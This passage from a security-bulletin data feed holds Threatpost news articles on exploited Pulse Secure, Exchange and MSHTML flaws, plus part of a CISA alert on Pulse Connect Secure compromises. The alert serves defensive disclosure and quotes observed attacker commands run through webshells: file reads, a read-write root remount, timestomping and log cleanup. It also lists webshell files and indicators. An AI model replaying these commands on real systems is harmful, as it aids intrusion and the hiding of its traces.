actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said, maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-14T21:20:46", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "modified": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:09:34", "description": "A federal agency has suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>) on Thursday, not naming the agency but providing technical details of the attack. Hackers, it said, gained initial access by using employees\u2019 legitimate Microsoft Office 365 log-in credentials to sign onto an agency computer remotely.\n\n\u201cThe cyber-threat actor had valid access credentials for multiple users\u2019 Microsoft Office 365 (O365) accounts and domain administrator accounts,\u201d according to CISA. \u201cFirst, the threat actor logged into a user\u2019s O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file. The cyber-threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization\u2019s virtual private network (VPN) server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs for how the attackers managed to get their hands on the credentials in the first place, CISA\u2019s investigation turned up no definitive answer \u2013 however, it speculated that it could have been a result of a vulnerability exploit that it said has been rampant across government networks.\n\n\u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability\u2014CVE-2019-11510\u2014in Pulse Secure,\u201d according to the alert. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\nThe patch was issued in April of 2019, but the Department of Homeland Security (DHS) in April of this year [noted that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) before the patches were deployed, bad actors were able to compromise Active Directory accounts via the flaw \u2013 so, even those who have patched for the bug could still be compromised and are vulnerable to attack.\n\nAfter initial access, the group set about carrying out reconnaissance on the network. First they logged into an agency O365 email account to view and download help-desk email attachments with \u201cIntranet access\u201d and \u201cVPN passwords\u201d in the subject lines \u2013 and it uncovered Active Directory and Group Policy key, changing a registry key for the Group Policy.\n\n\u201cImmediately afterward, the threat actor used common Microsoft Windows command line processes\u2014conhost, ipconfig, net, query, netstat, ping and whoami, plink.exe\u2014to enumerate the compromised system and network,\u201d according to CISA.\n\nThe next step was to connect to a virtual private server (VPS) through a Windows Server Message Block (SMB) client, using an alias secure identifier account that the group had previously created to log into it; then, they executed plink.exe, a remote administration utility.\n\nAfter that, they connected to command-and-control (C2), and installed a custom malware with the file name \u201cinetinfo.exe.\u201d The attackers also set up a locally mounted remote share, which \u201callowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis,\u201d CISA noted.\n\nThe cybercriminals, while logged in as an admin, created a scheduled task to run the malware, which turned out to be a dropper for additional payloads.\n\n\u201cinetinfo.exe is a unique, multi-stage malware used to drop files,\u201d explained CISA. \u201cIt dropped system.dll and 363691858 files and a second instance of inetinfo.exe. The system.dll from the second instance of inetinfo.exe decrypted 363691858 as binary from the first instance of inetinfo.exe. The decrypted 363691858 binary was injected into the second instance of inetinfo.exe to create and connect to a locally named tunnel. The injected binary then executed shellcode in memory that connected to IP address 185.142.236[.]198, which resulted in download and execution of a payload.\u201d\n\nIt added, \u201cThe cyber-threat actor was able to overcome the agency\u2019s anti-malware protection, and inetinfo.exe escaped quarantine.\u201d\n\nCISA didn\u2019t specify what the secondary payload was \u2013 Threatpost has reached out for additional information.\n\nThe threat group meanwhile also established a backdoor in the form of a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy.\n\n\u201cThe proxy allowed connections between an attacker-controlled remote server and one of the victim organization\u2019s file servers,\u201d according to CISA. \u201cThe reverse SOCKS proxy communicated through port 8100. This port is normally closed, but the attacker\u2019s malware opened it.\u201d\n\nA local account was then created, which was used for data collection and exfiltration. From the account, the cybercriminals browsed directories on victim file servers; copied files from users\u2019 home directories; connected an attacker-controlled VPS with the agency\u2019s file server (via a reverse SMB SOCKS proxy); and exfiltrated all the data using the Microsoft Windows Terminal Services client.\n\nThe attack has been remediated \u2013 and it\u2019s unclear when it took place. CISA said that it\u2019s intrusion-detection system was thankfully able to eventually flag the activity, however.\n\n\u201cCISA became aware\u2014via EINSTEIN, CISA\u2019s intrusion-detection system that monitors federal civilian networks\u2014of a potential compromise of a federal agency\u2019s network,\u201d according to the alert. \u201cIn coordination with the affected agency, CISA conducted an incident response engagement, confirming malicious activity.\u201d\n", "cvss3": {}, "published": "2020-09-24T20:47:40", "type": "threatpost", "title": "Feds Hit with Successful Cyberattack, Data Stolen", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2020-09-24T20:47:40", "id": "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "href": "https://threatpost.com/feds-cyberattack-data-stolen/159541/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-17T12:16:20", "description": "Criminals behind the Ryuk ransomware were early exploiters of the Windows MSHTML flaw, actively leveraging the bug in campaigns ahead of a patch released by [Microsoft](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) this week.\n\nCollaborative research by Microsoft and RiskIQ revealed campaigns by Ryuk threat actors early on that exploited the flaw, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The bug is a remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents. The two [released](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) [separate reports](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) online this week to provide a look into who has been using the flaw\u2013which can be used to hide a malicious ActiveX control in an Office document\u2013in attacks, as well as their potential connections to known criminal groups.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nSpecifically, most of the attacks that researchers analyzed used MSHTML as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders, which communicated with an infrastructure that is associated with multiple cybercriminal campaigns\u2013including human-operated ransomware, researchers from the Microsoft 365 Defender Threat Intelligence Team at the Microsoft Threat Intelligence Center (MSTIC) reported.\n\nRiskIQ identified the ransomware infrastructure as potentially belonging to the Russian-speaking [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) crime syndicate, known to maintain and distribute Ryuk ransomware.\n\n\u201cBased on multiple overlapping patterns in network infrastructure setup and use, we assess with high confidence that the operators behind the zero-day campaign are using infrastructure affiliated with Wizard Spider (CrowdStrike), and/or related groups UNC1878 (FireEye/Mandiant) and Ryuk (public), who continue to use Ryuk/Conti and BazaLoader/BazarLoader malware in targeted ransomware campaigns,\u201d RiskIQ\u2019s Team Atlas wrote in its analysis.\n\nMicrosoft stopped short of specifically identifying the threat actors observed exploiting the MSHTML flaw, instead referring to unidentified perpetrators as \u201cdevelopment groups\u201d using the prefix \u201cDEV\u201d and a number to indicate an emerging threat group.\n\n## **Separate Campaigns, Threat Actors**\n\nIn its analysis, the company cites activity from three DEV groups since August that have been seen in attacks leveraging CVE-2021-40444: DEV-0365, DEV-0193 and DEV-0413.\n\nThe infrastructure the company associates with DEV-0365 was used in the Cobalt Strike campaigns and follow-on activity, indicating \u201cmultiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware),\u201d according to researchers. However, DEV-0365 potentially may be involved only as a command-and-control infrastructure as a service for cybercriminals, the company said.\n\n\u201cAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads \u2014 activity that overlaps with a group Microsoft tracks as DEV-0193,\u201d the team said.\n\nMicrosoft attributed another campaign using the vulnerability to a group identified as DEV-0413. This campaign is \u201csmaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure,\u201d and was observed exploiting the flaw as early as Aug. 18.\n\nThe campaign used a social-engineering lure that aligned with the business operations of targeted organizations, \u201csuggesting a degree of purposeful targeting,\u201d the company observed.\n\n\u201cThe campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted,\u201d they wrote. \u201cIn most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\u201d\n\n## **History of a Vulnerability**\n\nMicrosoft first [revealed](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) the MSHTML zero-day vulnerability on Sept. 7, joining the Cybersecurity and Infrastructure Security Agency (CISA) in warning organizations of the bug and urging mitigations in separate alerts released that day.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nSomeone would have to open the malicious document for an attack to be successful, the company said. This is why attackers use email campaigns with lures that appear relevant to their targets in the hopes that they will launch embedded documents, researchers said.\n\nIndeed, at least one of the campaigns Microsoft researchers observed included emails impersonating contracts and legal agreements to try to trick victims to opening the documents to distribute the payload.\n\nThough it\u2019s not completely certain if Wizard Spider is behind some of these early attacks, it\u2019s clear that ransomware operators are interested in exploiting the MSHTML flaw, according to RiskIQ.\n\nHowever, at this point, \u201cwe assume there has been limited deployment of this zero-day,\u201d researchers wrote. That means that even if known ransomware criminals are involved in the attacks, delivering ransomware may not be the ultimate goal of the campaigns, they observed.\n\n\u201cInstead, we assess with medium confidence that the goal of the operators behind the zero-day may, in fact be traditional espionage,\u201d RISKIQ\u2019s Team Atlas wrote. \u201cThis goal could easily be obscured by a ransomware deployment and blend into the current wave of targeted ransomware attacks.\u201d\n\nNo matter, organizations should take advantage of the patch Microsoft released this week for the vulnerability and update their systems now before more attacks occur, the company reiterated. \u201cCustomers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability,\u201d the MSTIC team wrote.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-17T12:07:59", "type": "threatpost", "title": "Microsoft MSHTML Flaw Exploited by Ryuk Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T12:07:59", "id": "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "href": "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-08T12:29:02", "description": "Both Microsoft and federal cybersecurity officials are urging organizations to use mitigations to combat a zero-day remote control execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\nMicrosoft has not revealed much about the MSHTML bug, tracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), beyond that it is \u201caware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\u201d according to an advisory released Tuesday.\n\nHowever, it\u2019s serious enough that the Cybersecurity and Infrastructure Security Agency (CISA) released [an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>) of its own alerting users and administrators to the vulnerability and recommending that they use the mitigations and workarounds Microsoft recommends.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)The attacker would then have to convince the user to open the malicious document for an attack to be successful, the company said. Moreover, users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights, according to the advisory.\n\n## **Affecting More than Office**\n\nThough Microsoft is still investigating the vulnerability, it could prove to go beyond affecting just Microsoft Office documents due to the ubiquitous use of MSHTML on Windows, warned Jake Williams, co-founder and CTO at incident response firm [BreachQuest](<https://breachquest.com/>).\n\n\u201cIf you\u2019ve ever opened an application that seemingly \u2018magically\u2019 knows your proxy settings, that\u2019s likely because it uses MSHTML under the hood,\u201d he said in an e-mail to Threatpost. \u201cVulnerabilities like these tend to have extremely long lifetimes for exploitation in the wild.\u201d\n\nEven if the vulnerability\u2019s reach does not go beyond Office documents, its presence and the fact that attackers are already trying to exploit are worrisome enough for organizations to take immediate action, noted another security professional.\n\nMalicious Office documents are a popular tactic with cybercriminals and state-sponsored threat actors, and the vulnerability give them \u201cmore direct exploitation of a system and the usual tricking users to disable security controls,\u201d observed John Bambenek, principal threat hunter at digital IT and security operations firm [Netenrich](<https://netenrich.com/>).\n\n\u201cAs this is already being exploited, immediate patching should be done,\u201d he advised. \u201cHowever, this is a stark reminder that in 2021, we still can\u2019t send documents from point A to point B securely.\u201d\n\n## **Mitigations and Workarounds**\n\nMicrosoft has offered some advice for organizations affected by the vulnerability\u2014first discovered by Rick Cole of the Microsoft Security Response Center, Haifei Li of EXPMON, and Dhanesh Kizhakkinan, Bryce Abdo and Genwei Jiang of Mandiant\u2013until it can offer its own security update. That may come in the form of a Patch Tuesday fix or an out-of-band patch, depending on what researchers discover, the company said.\n\nUntil then, customers should keep anti-malware products up to date, though those who use automatic updates don\u2019t need to take action now, Microsoft said. For enterprise customers who manage updates, they should select the detection build 1.349.22.0 or newer and deploy it across their environments, the company added.\n\nWorkarounds for the flaw include disabling the installation of all ActiveX controls in Internet Explorer, which mitigates a potential attack, according to Microsoft.\n\n\u201cThis can be accomplished for all sites by updating the registry,\u201d the company said in its advisory. \u201cPreviously-installed ActiveX controls will continue to run, but do not expose this vulnerability.\u201d\n\nHowever, Microsoft warned organizations to take care when using the Registry Editor, because doing so incorrectly can \u201ccause serious problems that may require you to reinstall your operating system.\u201d \u201cUse Registry Editor at your own risk,\u201d the company advised.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-08T12:24:51", "type": "threatpost", "title": "Microsoft, CISA Urge Mitigations for Zero-Day RCE Flaw in Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T12:24:51", "id": "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "href": "https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/", "cvss": {"score": 0.0, "vector": "NONE"}}], "ics": [{"lastseen": "2023-05-27T16:32:55", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting a number of U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor\u2014or actors\u2014beginning in June 2020 or earlier related to vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA and Ivanti have assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>). To gain initial access, the threat actor is leveraging multiple vulnerabilities, including [CVE-2019-11510](<https://vulners.com/cve/CVE-2019-11510>), [CVE-2020-8260](<https://vulners.com/cve/CVE-2020-8260>), [CVE-2020-8243](<https://vulners.com/cve/CVE-2020-8243>), and the newly disclosed [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>). The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.\n\n_**(Updated May 3, 2021)**:_ Ivanti has released [Security Advisory SA44784](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>) addressing [CVE-2021-22893](<https://vulners.com/cve/CVE-2021-22893>) and three additional newly disclosed CVEs\u2014CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>), update to the [latest software version](<https://blog.pulsesecure.net/>), and investigate for malicious activity.\n\n_**(Updated May 27. 2021):**_ CISA has updated this alert to include new threat actor techniques, tactics, and procedures (TTPs), indicators of compromise (IOCs), and updated mitigations. See Ivanti [KB44755 - Pulse Connect Secure (PCS) Integrity Assurance](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) for updated guidance to ensure the full integrity of your Pulse Connect Secure software.\n\n_**(Updated July 21, 2021):**_ Please see CISA's new Malware Analysis Reports in regards to adversary activity analyzed by CISA that were discovered on Pulse Connect Secure Devices.\n\n * [MAR-10333209-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202a>)\n * [MAR-10333243-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202b>)\n * [MAR-10334057-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202c>)\n * [MAR-10334057-2.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202d>)\n * [MAR-10334587-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202e>)\n * [MAR-10334587-2.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202f>)\n * [MAR-10335467-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202g>)\n * [MAR-10336161-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202h>)\n * [MAR-10336935-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202i>)\n * [MAR-10337580-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202j>)\n * [MAR-10337580-2.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202k>)\n * [MAR-10338401-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202l>)\n * [MAR-10338868-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202m>)\n\n_**(Updated August 11, 2021):**_ Ivanti has released Pulse Connect Secure system software version 9.1R12 to address multiple vulnerabilities that an attacker could exploit to take control of an affected system. CISA encourages organizations to review [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) and apply the necessary update.\n\n_**(Updated August 24, 2021): **_Please see CISA's new Malware Analysis Reports for analysis of malicious activity discovered on Pulse Secure Connect devices.\n\n * [MAR-10336935-2.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236a>)\n * [MAR-10333243-3.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236b>)\n * [MAR-10338401-2.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236c>)\n * [MAR-10334057-3.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236d>)\n * [MAR-10339606-1.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>)\n\nFor a downloadable list of indicators of compromise (IOCs), see AA21-110A.stix.\n\n### Technical Details\n\nOn March 31, 2021, Ivanti released the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to detect the integrity of Pulse Connect Secure appliances. Their technical bulletin states:\n\n_We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE- 2020- 8260). For more information visit KB44764 (Customer FAQ)._\n\n_**(Updated May 27, 2021)**:_ CISA has observed the cyber threat actor performing cleanup as demonstrated by the following:\n\n 1. Threat actor was observed timestomping trojanized umount binary to match timestamps of legitimate binaries attempting to disguise the modifications; the touch command was used to modify the time stamp https://attack.mitre.org/techniques/T1070/006/:\n\n/bin/touch /tmp/data/root/bin/umount -r /tmp/data/root/bin/cp\n\n2\\. The threat actor deleted files from temp directories using \"rm -f\": \n\n/bin/rm -f tmp1 \n/bin/rm -f tmp2\n\n3\\. Timestamps:\n\n**Note: **for context, loop 6 is the active partition and loop 8 is the rollback partition of the device.\n\n**Date ** | Time (GMT) | Partition | Artifact | Activity \n---|---|---|---|--- \n4/13/21 | 5:15:33 | pulse-loop6 | /bin/umount | Content Modification Time \n4/20/21 | 19:09:14 | pulse-loop8 | /bin/umount | Metadata Modification Time \n4/20/21 | 19:09:14 | pulse-loop8 | /bin/umount | Content Modification Time \n4/20/21 | 19:18:49 | pulse-loop6 | /bin/umount | Metadata Modification Time \n4/23/21 | 16:14:48 | pulse-loop6 | /bin/umount | Last Access Time \n5/6/21 | 14:27:20 | pulse-loop8 | /bin/umount | Last Access Time \n4/20/21 | 19:08:01 | pulse-loop6 | /bin/touch | Last Access Time \n4/20/21 | 19:09:14 | pulse-loop8 | /bin/touch | Last Access Time \n \nSecurity firm FireEye has posted more information on their blog, including activity related to actor clean up. See the FireEye blog post, [Re-Checking Your Pulse](<https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html>), for more information, including activity related to actor cleanup.\n\nThe suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality:\n\n * `DSUpgrade.pm MD5`: `4d5b410e1756072a701dfd3722951907`\n * Runs arbitrary commands passed to it\n * Copies malicious code into `Licenseserverproto.cgi`\n * `Licenseserverproto.cgi MD5`: `9b526db005ee8075912ca6572d69a5d6`\n * Copies malicious logic to the new files during the patching process, allowing for persistence\n * `Secid_canceltoken.cgi MD5`: `f2beca612db26d771fe6ed7a87f48a5a`\n * Runs arbitrary commands passed via `HTTP` requests\n * `compcheckresult.cgi MD5`: `ca0175d86049fa7c796ea06b413857a3`\n * Publicly-facing page to send arbitrary commands with `ID` argument\n * `Login.cgi MD5`: `56e2a1566c7989612320f4ef1669e7d5`\n * Allows for credential harvesting of authenticated users\n * `Healthcheck.cgi MD5:` `8c291ad2d50f3845788bc11b2f603b4a`\n * Runs arbitrary commands passed via `HTTP` requests\n\nMany of the threat actor\u2019s early actions are logged in the Unauthenticated Requests Log as seen in the following format, URIs have been redacted to minimize access to webshells that may still be active:\n\n`Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.`\n\nThe threat actor then ran the commands listed in table 1 via the webshell.\n\n_Table 1: Commands run via webshell_\n\n**Time ** | **Command ** \n---|--- \n2021-01-19T07:46:05.000+0000 | `pwd` \n2021-01-19T07:46:24.000+0000 | `cat%20/home/webserver/htdocs/dana-na/[redacted]` \n2021-01-19T08:10:13.000+0000 | `cat%20/home/webserver/htdocs/dana-na/l[redacted]` \n2021-01-19T08:14:18.000+0000 | See Appendix. \n2021-01-19T08:15:11.000+0000 | `cat%20/home/webserver/htdocs/dana-na/[redacted]` \n2021-01-19T08:15:49.000+0000 | `cat%20/home/webserver/htdocs/dana-na/[redacted]` \n2021-01-19T09:03:05.000+0000 | `cat%20/home/webserver/htdocs/dana-na/[redacted]` \n2021-01-19T09:04:47.000+0000 | `$mount` \n2021-01-19T09:05:13.000+0000 | `/bin/mount%20-o%20remount,rw%20/dev/root%20/` \n2021-01-19T09:07:10.000+0000 | `$mount` \n \nThe cyber threat actor is using exploited devices located on residential IP space\u2014including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors\u2014to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity. Note: these devices are not related to the Pulse vulnerabilities, but rather, where the malicious internet traffic passes through.\n\nDetails about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available.\n\n### (Updated April 30, 2021): Detections\n\n#### _(Updated April 30, 2021): Impossible Travel_\n\nDuring the course of analysis, it is possible that a network defender may be able to reveal illegitimate connections from users that are masquerading as legitimate users from different geolocations. CISA has noted IPs associated with malicious webshell interaction from a threat actor\u2014associated with a single username\u2014in both the authenticated and the unauthenticated logs at the same time. The geo-location for the two IP addresses was sufficiently far that impossible travel calculations could detect the threat actor IP address.\n\n#### _(Updated April 30, 2021): TLS Fingerprinting_\n\nTransport Layer Security (TLS) fingerprinting may also be useful in identifying malicious activity. CISA has noted re-use of various JA3 hashes including JA3 hashes that align with Chrome, Firefox, and others. Caution should be taken when using TLS fingerprinting because the majority of the JA3 hashes observed in connection with Pulse Connect Secure exploitation were not unique to malicious activity. The same JA3 hashes\u2014and the software they characterize\u2014are often used for benign activity, vulnerability scanning, etc. Overlap in JA3 hashes cannot be considered a high-fidelity indicator of malicious activity, let alone successful exploitation. Connections made via JA3 must be corroborated with other data points.\n\n * A common observation is that the TLS connections frequently exclude the Server Name Indication (SNI) extension, which is relatively rare in most environments where users connect to Domain Name Server (DNS) host names (but is commonly observed in scanning). It is believed this is an artifact of attackers browsing direct to IP addresses instead of host names.\n * The JA3 hashes in table 2 below have been observed in connection with a pulse secure exploitation. **Note:** there may be many User-Agents associated with a given 